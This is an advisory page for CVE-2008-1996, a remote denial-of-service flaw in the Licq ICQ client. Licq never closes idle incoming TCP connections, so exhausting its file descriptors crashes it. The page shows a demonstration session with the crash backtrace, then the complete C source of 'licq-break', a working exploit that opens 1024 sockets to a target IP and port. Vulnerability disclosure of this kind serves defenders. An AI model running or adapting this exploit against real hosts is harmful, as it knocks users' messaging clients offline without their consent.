licq remote DoS

2008.05.03
Credit: Milen Rangelov
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2008-1996
CWE: CWE-399


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Hello, Licq is a linux qt-based ICQ client. There is a vulnerability in the way licq processes new incoming TCP connections which can be exploited by a remote attacker to crash the client. When executed, licq opens a listening socket at a random port (AFAIK between 30000 and 65000). There is no host-based authentication and any remote host can connect to it. Those connections are not closed by licq after a given timeout period. When all possible open file descriptors are exhausted (they are limited to 1024 for non-root users in most linux installations /ulimit -n/), a new incoming TCP connection causes licq to crash. Here is some example: We run licq: gat3way@gat3way:~$ licq from another console, we find out the port licq is listening to (we'd need to portscan if the target is on a remote system): gat3way@gat3way:/tmp$ lsof |grep licq|grep LISTEN licq 10783 gat3way 9u IPv4 35993218 TCP *:52259 (LISTEN) Now we run our "evil" denial of service code: gat3way@gat3way:/tmp$ ./licq-break 127.0.0.1 52259 ip=127.0.0.1 done! and go back to the console on which we ran licq...oops.. Licq Segmentation Violation Detected. Backtrace (saved in /home/gat3way/.licq//licq.backtrace): licq(licq_handle_sigabrt+0x2b4) [0x80f68d4] [0xffffe420] /lib/libc.so.6(abort+0x101) [0xb7b17811] licq [0x80f6b1d] [0xffffe420] licq(_Z18MonitorSockets_tepPv+0x3ca) [0x80c907a] /lib/libpthread.so.0 [0xb7d9e383] /lib/libc.so.6(clone+0x5e) [0xb7bc173e] Attempting to generate core file. .... The source of licq-break (nothing particular, just connects MAX sockets to a certain port at the victim's host): ------------------------- #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> // change to suit your needs #define MAX 1024 int fds[MAX]; int main(int argc, char *argv[]) { int port,a; char host[12]; struct sockaddr_in victim; struct in_addr inp; if (argc!=3) { printf("usage: %s <ip> <port>\n",argv[0]); exit(1); } port=atoi(argv[2]); strcpy(host,argv[1]); printf("ip=%s\n",host); for (a=1;a<=MAX;a++) { fds[a]=socket(PF_INET,SOCK_STREAM,0); victim.sin_family= AF_INET; victim.sin_port=htons(port); inet_aton(host,&victim.sin_addr); connect(fds[a],&victim,sizeof(victim)); } printf("done!"); }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top